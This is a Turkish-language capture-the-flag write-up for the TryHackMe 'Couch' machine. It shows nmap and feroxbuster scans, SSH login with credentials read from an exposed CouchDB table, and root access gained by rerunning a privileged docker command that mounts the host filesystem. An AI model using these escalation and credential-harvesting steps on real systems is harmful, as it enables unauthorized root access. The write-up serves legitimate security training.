Table of Contents
Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Couch” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…
Çözüm
1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -sS -sV -p- 10.10.124.122
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-25 07:35 EDT
Nmap scan report for 10.10.124.122
Host is up (0.064s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
5984/tcp open http CouchDB httpd 1.6.1 (Erlang OTP/18)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2 — Dizin taraması yapıyorum.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# feroxbuster --url http://10.10.124.122:5984/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -C 400,403,404
3 — “_utils” dizinine gittiğim zaman veritabanındaki tabloları görüyorum. “secret” tablosuna baktığım zaman “passwordbackup” sütununda “atena” kullanıcısına ait giriş bilgilerini görüyorum.
passwordbackup -> atena:*CENSORED*
4 — SSH bağlantısı kurduktan sonra ilk bayrağı elde ediyorum.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh atena@10.10.124.122
*
*
atena@ubuntu:~$ ls
user.txt
atena@ubuntu:~$ cat user.txt
*CENSORED*
5 — Komut geçmişine baktığım zaman bir docker komutu çalıştırıldığını görüyorum.
atena@ubuntu:~$ history
*
*
166 docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
6 — Aynı komutu tekrar çalıştırdığım zaman ikinci bayrağı da elde ediyorum.
atena@ubuntu:~$ docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
/ # ls
bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var
/ # cd /mnt
/mnt # ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
/mnt # cd root
/mnt/root # ls
root.txt
/mnt/root # cat root.txt
*CENSORED*